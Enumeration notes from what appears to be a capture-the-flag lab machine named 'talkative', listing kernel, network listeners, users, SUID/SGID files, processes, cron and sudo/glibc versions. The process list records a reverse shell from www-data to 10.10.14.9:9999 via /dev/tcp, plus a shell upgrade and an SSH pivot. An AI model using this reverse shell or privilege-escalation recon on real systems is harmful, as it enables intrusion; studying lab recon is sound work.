System/Kernel


saul@talkative:~$ file /bin/bash ; unamfile /bin/bash ; uname -a ; cat /etc/*release
/bin/bash: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=a6cb40078351e05121d46daa768e271846d5cc54, for GNU/Linux 3.2.0, stripped
linux talkative 5.4.0-81-generic #91-ubuntu smp thu jul 15 19:09:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.4 LTS"
NAME="Ubuntu"
VERSION="20.04.4 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.4 LTS"
VERSION_ID="20.04"
home_url="https://www.ubuntu.com/"
support_url="https://help.ubuntu.com/"
bug_report_url="https://bugs.launchpad.net/ubuntu/"
privacy_policy_url="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal

5.4.0-81-generic x86_64 Ubuntu 20.04.4 LTS (Focal Fossa)

Networks


saul@talkative:~$ netstat -antup4
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 172.17.0.1:6001         0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8081            0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6002         0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8082            0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6003         0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6004         0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6005         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6006         0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6007         0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6008         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6009         0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6010         0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6011         0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6012         0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6013         0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6014         0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6015         0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:6000         0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      -                   
tcp        0      1 10.10.11.155:48728      1.1.1.1:53              SYN_SENT    -                   
tcp        0      0 10.10.11.155:22         172.17.0.13:52948       ESTABLISHED -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 127.0.0.1:53532         127.0.0.53:53           ESTABLISHED -                   

Users & Groups


saul@talkative:~$ cat /etc/passwd ; ls -lasht /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
saul:x:1000:1000:Saul,,,:/home/saul:/bin/bash
total 12K
4.0k drwxr-xr-x  6 saul saul 4.0k jun  8 16:21 saul
4.0K drwxr-xr-x 19 root root 4.0K Mar 15  2022 ..
4.0K drwxr-xr-x  3 root root 4.0K Aug 10  2021 .
saul@talkative:~$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=111(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=112(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=998(lxd) gid=100(users) groups=100(users)
uid=1000(saul) gid=1000(saul) groups=1000(saul)

SUIDs


saul@talkative:~$ find / -perm -04000 -ls -type f 2>/dev/null
   395114     56 -rwsr-sr-x   1 daemon   daemon      55560 Nov 12  2018 /usr/bin/at
   397334     88 -rwsr-xr-x   1 root     root        88464 Jul 14  2021 /usr/bin/gpasswd
   402231     68 -rwsr-xr-x   1 root     root        67816 Feb  7  2022 /usr/bin/su
   397146     40 -rwsr-xr-x   1 root     root        39144 Feb  7  2022 /usr/bin/umount
   394945     44 -rwsr-xr-x   1 root     root        44784 Jul 14  2021 /usr/bin/newgrp
   397328     84 -rwsr-xr-x   1 root     root        85064 Jul 14  2021 /usr/bin/chfn
   397336     68 -rwsr-xr-x   1 root     root        68208 Jul 14  2021 /usr/bin/passwd
   395293     40 -rwsr-xr-x   1 root     root        39144 Mar  7  2020 /usr/bin/fusermount
   394151     56 -rwsr-xr-x   1 root     root        55528 Feb  7  2022 /usr/bin/mount
   395718    164 -rwsr-xr-x   1 root     root       166056 Jan 19  2021 /usr/bin/sudo
   397330     52 -rwsr-xr-x   1 root     root        53040 Jul 14  2021 /usr/bin/chsh
   396001     16 -rwsr-xr-x   1 root     root        14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
   397208    464 -rwsr-xr-x   1 root     root       473576 Dec  2  2021 /usr/lib/openssh/ssh-keysign
   395994     52 -rwsr-xr--   1 root     messagebus    51344 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   398341     24 -rwsr-xr-x   1 root     root          22840 Feb 21  2022 /usr/lib/policykit-1/polkit-agent-helper-1

SGIDs


saul@talkative:~$ find / -perm -02000 -ls -type f 2>/dev/null
      372      0 drwxr-sr-x   2 root     systemd-journal       40 jun  8 11:23 /run/log/journal
   139812      4 drwxr-sr-x   3 root     systemd-journal     4096 Aug 10  2021 /var/log/journal
     8062      4 drwxr-sr-x   2 root     systemd-journal     4096 jun  8 16:12 /var/log/journal/0378ecf490b847babd462f052e335e24
   139613      4 drwxrwsr-x   2 root     mail                4096 Feb  1  2021 /var/mail
    13202      4 drwxrwsr-x   2 root     staff               4096 Apr 15  2020 /var/local
   395302     44 -rwxr-sr-x   1 root     shadow             43168 Sep 17  2021 /usr/sbin/pam_extrausers_chkpwd
   395321     44 -rwxr-sr-x   1 root     shadow             43160 Sep 17  2021 /usr/sbin/unix_chkpwd
   395114     56 -rwsr-sr-x   1 daemon   daemon             55560 Nov 12  2018 /usr/bin/at
   397202    344 -rwxr-sr-x   1 root     ssh               350504 Dec  2  2021 /usr/bin/ssh-agent
   397327     84 -rwxr-sr-x   1 root     shadow             84512 Jul 14  2021 /usr/bin/chage
   395212     44 -rwxr-sr-x   1 root     crontab            43720 Feb 13  2020 /usr/bin/crontab
   397332     32 -rwxr-sr-x   1 root     shadow             31312 Jul 14  2021 /usr/bin/expiry
   395127     16 -rwxr-sr-x   1 root     tty                14488 Mar 30  2020 /usr/bin/bsd-write
   395395     36 -rwxr-sr-x   1 root     tty                35048 Feb  7  2022 /usr/bin/wall
     5775     16 -rwxr-sr-x   1 root     utmp               14648 Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
   427264      4 drwxrwsr-x   2 root     staff               4096 Aug 11  2021 /usr/local/share/fonts
   401088      4 drwxrwsr-x   3 root     staff               4096 Feb  1  2021 /usr/local/lib/python3.8
   401089      4 drwxrwsr-x   6 root     staff               4096 Aug 28  2021 /usr/local/lib/python3.8/dist-packages
   435180      4 drwxr-sr-x   3 root     staff               4096 Aug 28  2021 /usr/local/lib/python3.8/dist-packages/pymongo
   435181      4 drwxr-sr-x   2 root     staff               4096 Aug 28  2021 /usr/local/lib/python3.8/dist-packages/pymongo/__pycache__
   435210      4 drwxr-sr-x   3 root     staff               4096 Aug 28  2021 /usr/local/lib/python3.8/dist-packages/bson
   435230      4 drwxr-sr-x   2 root     staff               4096 Aug 28  2021 /usr/local/lib/python3.8/dist-packages/bson/__pycache__
   435249      4 drwxr-sr-x   2 root     staff               4096 Aug 28  2021 /usr/local/lib/python3.8/dist-packages/pymongo-3.12.0.dist-info
   435255      4 drwxr-sr-x   3 root     staff               4096 Aug 28  2021 /usr/local/lib/python3.8/dist-packages/gridfs
   435259      4 drwxr-sr-x   2 root     staff               4096 Aug 28  2021 /usr/local/lib/python3.8/dist-packages/gridfs/__pycache__

Processes


saul@talkative:~$ ps -auxwww           ps -auxwww
ps -auxwww
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 167540  8024 ?        Ss   11:23   0:04 /sbin/init auto automatic-ubiquity noprompt
root         484  0.0  0.6  67860 13332 ?        S<s  11:23   0:01 /lib/systemd/systemd-journald
root         511  0.0  0.1  21648  3132 ?        Ss   11:23   0:01 /lib/systemd/systemd-udevd
systemd+     512  0.0  0.1  18500  2832 ?        Ss   11:23   0:00 /lib/systemd/systemd-networkd
root         655  0.0  0.8 214596 17944 ?        SLsl 11:23   0:02 /sbin/multipathd -d -s
systemd+     678  0.0  0.2  23992  4084 ?        Ss   11:23   0:03 /lib/systemd/systemd-resolved
systemd+     679  0.0  0.1  90188  2436 ?        Ssl  11:23   0:01 /lib/systemd/systemd-timesyncd
root         688  0.0  0.1  47540  2504 ?        Ss   11:23   0:00 /usr/bin/VGAuthService
root         692  0.1  0.1 311508  3192 ?        Ssl  11:23   0:28 /usr/bin/vmtoolsd
root         741  0.0  0.1 235560  3568 ?        Ssl  11:23   0:01 /usr/lib/accountsservice/accounts-daemon
message+     742  0.0  0.1   7528  3920 ?        Ss   11:23   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         758  0.0  0.1  81956  3008 ?        Ssl  11:23   0:01 /usr/sbin/irqbalance --foreground
root         759  0.0  0.2  29332  5120 ?        Ss   11:23   0:01 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
syslog       763  0.0  0.1 224344  3544 ?        Ssl  11:23   0:00 /usr/sbin/rsyslogd -n -iNONE
root         764  0.0  0.2  16680  5556 ?        Ss   11:23   0:00 /lib/systemd/systemd-logind
root         765  0.0  0.2 392516  5132 ?        Ssl  11:23   0:00 /usr/lib/udisks2/udisksd
root         799  0.0  0.1   6812  2264 ?        Ss   11:23   0:00 /usr/sbin/cron -f
root         807  0.0  0.6 1344512 13224 ?       Ssl  11:23   0:16 /usr/bin/containerd
daemon       808  0.0  0.1   3792  2084 ?        Ss   11:23   0:00 /usr/sbin/atd -f
root         821  0.0  0.0   5828  1496 tty1     Ss+  11:23   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root         836  0.0  0.2  12172  4292 ?        Ss   11:23   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         860  0.0  0.1 232712  3840 ?        Ssl  11:23   0:00 /usr/lib/policykit-1/polkitd --no-debug
root         899  0.0  0.9 1529768 19944 ?       Ssl  11:23   0:07 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root         949  0.0  0.0   2488   508 ?        S    11:23   0:00 bpfilter_umh
root        1198  0.0  0.0 711024  1716 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 57dcf3cae6efacec8759265c9e5d234d57cb13a818825172b4f4a03166435c42 -address /run/containerd/containerd.sock
systemd+    1221  1.0  1.5 1391756 30308 ?       Ssl  11:24   3:13 mongod --smallfiles --replSet rs0 --oplogSize 128 --bind_ip_all
root        1287  0.0  0.0 1222576  684 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 8082 -container-ip 172.18.0.2 -container-port 41339
root        1293  0.0  0.0 1223984  448 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 8082 -container-ip 172.18.0.2 -container-port 41339
root        1314  0.0  0.0 1148844  736 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 8081 -container-ip 172.18.0.2 -container-port 41338
root        1320  0.0  0.0 1149100  652 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 8081 -container-ip 172.18.0.2 -container-port 41338
root        1337  0.0  0.0 1149100  924 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 8080 -container-ip 172.18.0.2 -container-port 41337
root        1342  0.0  0.0 1148844  616 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 8080 -container-ip 172.18.0.2 -container-port 41337
root        1361  0.0  0.0 711024  1560 ?        Sl   11:24   0:02 /usr/bin/containerd-shim-runc-v2 -namespace moby -id b06821bbda786b9790c5d7efd202f1d43534dd343f781bcd414aa06a447b7cf6 -address /run/containerd/containerd.sock
root        1384  0.0  0.0 101704   476 ?        Ss   11:24   0:00 /bin/bash /usr/bin/jamovi-server 41337 --if=*
root        1459  0.3  1.2 1481008 25256 ?       Sl   11:24   1:06 python3 -u -m jamovi.server 41337 --if=*
root        1481  0.0  0.0 1223984  588 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 3000 -container-ip 172.17.0.3 -container-port 3000
root        1496  0.0  0.0 711024  1600 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 -address /run/containerd/containerd.sock
root        1530  0.7 17.9 1791748 359348 ?      Ssl  11:24   2:17 node main.js
root        1543  0.0  0.0 1222832  744 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6000 -container-ip 172.17.0.4 -container-port 80
root        1559  0.0  0.0 711024  1556 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id ad09f5a3bd8e87037547b385d259ddd01dd17873d3fc61d87568e294cdf2fae5 -address /run/containerd/containerd.sock
root        1587  0.0  0.2 215680  4232 ?        Ss   11:24   0:01 apache2 -DFOREGROUND
root        1697  0.0  0.0 1075112  772 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6001 -container-ip 172.17.0.5 -container-port 80
root        1715  0.0  0.0 711280  1440 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id c47ddf96394c6f35c9af0d369dddfbe0ba18c8e88b72fb51451e6aaaf77306ff -address /run/containerd/containerd.sock
root        1835  0.0  0.0 1148844  744 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6002 -container-ip 172.17.0.6 -container-port 80
root        1851  0.0  0.0 711024  1452 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 95f1322cf332d0794d48f4c4d9d30f53ca47da0a1865d80ea7892f7c41871545 -address /run/containerd/containerd.sock
root        1991  0.0  0.0 1148844  652 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6003 -container-ip 172.17.0.7 -container-port 80
root        2017  0.0  0.0 711024  1688 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 6b7abdc2f9915d39a789794b2e4387405fba7de6b89a12a65c78f4b1fc32096a -address /run/containerd/containerd.sock
root        2111  0.0  0.0 1075368 1772 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6004 -container-ip 172.17.0.8 -container-port 80
root        2123  0.0  0.0 711024  1548 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 5afd96c9af335e96bca17877a5d4219560bcaa8ec14c289b7ddd3ec84d873860 -address /run/containerd/containerd.sock
root        2211  0.0  0.0 1222832 1664 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6005 -container-ip 172.17.0.9 -container-port 80
root        2231  0.0  0.0 711280  1416 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id b611caf4e2288116075b2cfa8655a7e707cf41204312f2d16d263c6b40790a4d -address /run/containerd/containerd.sock
root        2330  0.0  0.0 1222832 1944 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6006 -container-ip 172.17.0.10 -container-port 80
root        2346  0.0  0.0 711024  1548 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 7e91f953b6a2e2c5a2cecb307085db8e5e702a159f87e6db0d27bb829cabcb4f -address /run/containerd/containerd.sock
root        2443  0.0  0.0 1148844 1732 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6007 -container-ip 172.17.0.11 -container-port 80
root        2457  0.0  0.1 710768  2100 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 8d38081dd42dbd96d937374a21aab33606bedd262966c883d2b66414d0944728 -address /run/containerd/containerd.sock
root        2551  0.0  0.0 1222576 1784 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6008 -container-ip 172.17.0.12 -container-port 80
root        2565  0.0  0.0 711344  1508 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 4a5b9bb7e5818501348267ca7c8db3b16857fa49074d55134004b1bbab503294 -address /run/containerd/containerd.sock
root        2664  0.0  0.0 1222576 1532 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6009 -container-ip 172.17.0.13 -container-port 80
root        2680  0.0  0.1 710768  2084 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 2f9b5795d152d9f92bc83287d1a98dfb917185203e3492527087621d6998c469 -address /run/containerd/containerd.sock
root        2779  0.0  0.0 1076520 1556 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6010 -container-ip 172.17.0.14 -container-port 80
root        2793  0.0  0.0 711024  1420 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id c40e1843137106363eb7aa6710bd2c000e26baa68576a4cdea3576a513276c05 -address /run/containerd/containerd.sock
root        2890  0.0  0.0 1076520 1732 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6011 -container-ip 172.17.0.15 -container-port 80
root        2905  0.0  0.0 711024  1836 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 70d780920da212e44578efa05b8929d4ebc96e77617d4d0c424ce0a57db2bfe5 -address /run/containerd/containerd.sock
root        3003  0.0  0.0 1150252 1680 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6012 -container-ip 172.17.0.16 -container-port 80
root        3018  0.0  0.0 711024  1572 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 0dd309544d0ae68ea795b6eca3db933658cfedbe93a3fc10508af65a01ecbf43 -address /run/containerd/containerd.sock
root        3120  0.0  0.0 1148844 1640 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6013 -container-ip 172.17.0.17 -container-port 80
root        3135  0.0  0.0 711024  1444 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 3f192e7e9d0622d10c249beddc1e47dfc6d558ca4c632e1f9a94ed67b3b4c079 -address /run/containerd/containerd.sock
root        3227  0.0  0.0 1150508 1724 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6014 -container-ip 172.17.0.18 -container-port 80
root        3243  0.0  0.1 711024  2092 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 3fd5f2e50043c6646beebe19ebfc3c678248b479f82474a9dca48d79310dadf5 -address /run/containerd/containerd.sock
root        3340  0.0  0.0 1149100 1724 ?        Sl   11:24   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6015 -container-ip 172.17.0.19 -container-port 80
root        3355  0.0  0.1 711024  2284 ?        Sl   11:24   0:03 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 8e3f252775dfb8105cec9b7428fa59fee17d60f60535683d3f232cf5d52f795b -address /run/containerd/containerd.sock
root        3376  0.0  0.0 215680   348 ?        Ss   11:24   0:00 apache2 -DFOREGROUND
www-data    3429  0.0  0.0 215712     4 ?        S    11:24   0:00 apache2 -DFOREGROUND
root        4536  0.0  0.4 1066668 9880 ?        Sl   12:32   0:09 /usr/lib/jamovi/bin/jamovi-engine --con=ipc:///tmp/tmpa5afk9sy/conn-0 --path=/tmp/tmpoc3bqdif
www-data    8103  0.0  0.0   2412   528 ?        S    16:08   0:00 sh -c bash -c "bash -i >& /dev/tcp/10.10.14.9/9999 0>&1"
www-data    8104  0.0  0.1   3828  2732 ?        S    16:08   0:00 bash -c bash -i >& /dev/tcp/10.10.14.9/9999 0>&1
www-data    8105  0.0  0.1   4092  3320 ?        S    16:08   0:00 bash -i
www-data    8314  0.0  0.0   2456  1832 ?        S    16:11   0:00 script /dev/null -c bash
www-data    8315  0.0  0.0   2412   584 pts/0    Ss   16:11   0:00 sh -c bash
www-data    8316  0.0  0.1   4092  3324 pts/0    S    16:11   0:00 bash
www-data    8535  0.0  0.2   9004  5828 pts/0    R+   16:13   0:00 ssh saul@10.10.11.155
root        8536  0.0  0.4  13920  8936 ?        Ss   16:13   0:00 sshd: saul [priv]
saul        8554  0.0  0.4  18600  9472 ?        Ss   16:13   0:00 /lib/systemd/systemd --user
saul        8555  0.0  0.1 168896  2688 ?        S    16:13   0:00 (sd-pam)
saul        8632  0.0  0.2  14056  5932 ?        S    16:13   0:00 sshd: saul@pts/0
saul        8633  0.0  0.2   8304  5168 pts/0    Ss   16:13   0:00 -bash

/usr/sbin/cron -f /usr/lib/policykit-1/polkitd --no-debug

Cron & Systemd


saul@talkative:~$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for saul
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
 
SHELL=/bin/sh
path=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 
# example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT                        LEFT          LAST                        PASSED   >
thu 2023-06-08 16:39:00 UTC 6min left     Thu 2023-06-08 16:09:06 UTC 23min ago>
thu 2023-06-08 18:09:02 UTC 1h 36min left Thu 2023-06-08 12:06:13 UTC 4h 26min >
thu 2023-06-08 20:23:00 UTC 3h 50min left Mon 2022-04-04 17:47:57 UTC 1 years 2>
thu 2023-06-08 22:32:35 UTC 6h left       Tue 2022-03-15 16:32:30 UTC 1 years 2>
fri 2023-06-09 00:00:00 UTC 7h left       Thu 2023-06-08 11:23:55 UTC 5h 8min a>
fri 2023-06-09 00:00:00 UTC 7h left       Thu 2023-06-08 11:23:55 UTC 5h 8min a>
fri 2023-06-09 06:07:31 UTC 13h left      Thu 2023-06-08 14:08:40 UTC 2h 23min >
fri 2023-06-09 06:58:58 UTC 14h left      Thu 2023-06-08 12:14:53 UTC 4h 17min >
fri 2023-06-09 11:38:51 UTC 19h left      Thu 2023-06-08 11:38:51 UTC 4h 53min >
sun 2023-06-11 03:10:30 UTC 2 days left   Thu 2023-06-08 11:23:58 UTC 5h 8min a>
mon 2023-06-12 00:00:00 UTC 3 days left   Thu 2023-06-08 11:23:55 UTC 5h 8min a>
 
11 timers listed.
Pass --all to see loaded but inactive timers, too.
lines 1-15/15 (END)

Sudo Version


saul@talkative:~$ sudo -V
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

Sudo version 1.8.31

Glibc Version


saul@talkative:~$ ldd --version
ldd (Ubuntu GLIBC 2.31-0ubuntu9.7) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

ldd (Ubuntu GLIBC 2.31-0ubuntu9.7) 2.31